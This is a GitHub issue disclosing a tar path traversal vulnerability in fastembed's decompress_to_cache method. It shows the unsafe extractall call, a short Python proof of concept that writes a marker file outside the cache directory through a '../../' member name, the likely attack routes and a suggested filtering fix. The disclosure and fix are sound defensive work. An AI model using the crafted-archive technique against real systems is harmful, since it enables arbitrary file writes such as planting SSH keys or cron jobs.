[Bug]: Tar path traversal (Zip Slip) in decompress_to_cache — arbitrary file write outside cache directory

## Summary

The `decompress_to_cache` method uses `tarfile.extractall()` without sanitizing member paths, making it vulnerable to **Zip Slip / Tar Slip** (CVE-2007-4559 class). A malicious tar archive can write files to arbitrary locations outside `cache_dir`.

**Note:** This is related to but distinct from #327, which tracks the DeprecationWarning/platform compatibility aspect. This issue specifically addresses the **security vulnerability** — path traversal allowing arbitrary file writes.

## Affected Code

**File:** `fastembed/common/model_management.py`, lines 304–311

```python
@classmethod
def decompress_to_cache(cls, targz_path: str, cache_dir: str) -> str:
    # ...
    with tarfile.open(targz_path, "r:gz") as tar:
        tar.extractall(
            path=cache_dir,   # No filter, no member sanitization
        )
```

## Reproduction

```python
import tarfile, os, tempfile, io

# Create a malicious tar that writes outside the intended directory
with tempfile.NamedTemporaryFile(suffix='.tar.gz', delete=False) as f:
    evil_tar = f.name

with tarfile.open(evil_tar, 'w:gz') as tar:
    payload = b"PWNED"
    info = tarfile.TarInfo(name="../../tmp/fastembed_pwned.txt")
    info.size = len(payload)
    tar.addfile(info, io.BytesIO(payload))

# Call decompress_to_cache with this tar
cache_dir = tempfile.mkdtemp()
from fastembed.common.model_management import ModelManagement
ModelManagement.decompress_to_cache(evil_tar, cache_dir)

# File written outside cache_dir:
print(os.path.exists("/tmp/fastembed_pwned.txt"))  # True
```

## Attack Surface

- Custom model URLs via `add_custom_model()` pointing to attacker-controlled servers
- Compromised HuggingFace repos or GCS buckets (supply chain attack)
- MITM on HTTP redirects

## Impact

- **Arbitrary file write** to any path writable by the process (SSH keys, cron jobs, Python packages, shell configs)
- On Python 3.14, the default `filter` changes to `'data'`, which will silently change extraction behavior and may break existing archives

## Suggested Fix

Add path filtering to block traversal:

```python
@classmethod
def decompress_to_cache(cls, targz_path: str, cache_dir: str) -> str:
    with tarfile.open(targz_path, "r:gz") as tar:
        # Python 3.12+: use filter='data' to block traversal
        # Python 3.11 and earlier: manual sanitization
        try:
            tar.extractall(path=cache_dir, filter='data')
        except TypeError:
            # Python < 3.12 fallback
            for member in tar.getmembers():
                member_path = os.path.realpath(os.path.join(cache_dir, member.name))
                if not member_path.startswith(os.path.realpath(cache_dir) + os.sep):
                    raise ValueError(f"Unsafe tar member path: {member.name}")
            tar.extractall(path=cache_dir)
```

---

*Found via automated codebase analysis. Confirmed independently by three reviewers (Claude, Codex, Gemini).*

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

[Bug]: Tar path traversal (Zip Slip) in decompress_to_cache — arbitrary file write outside cache directory #626

Summary

Affected Code

Reproduction

Attack Surface

Impact

Suggested Fix

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

[Bug]: Tar path traversal (Zip Slip) in decompress_to_cache — arbitrary file write outside cache directory #626

Description

Summary

Affected Code

Reproduction

Attack Surface

Impact

Suggested Fix

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions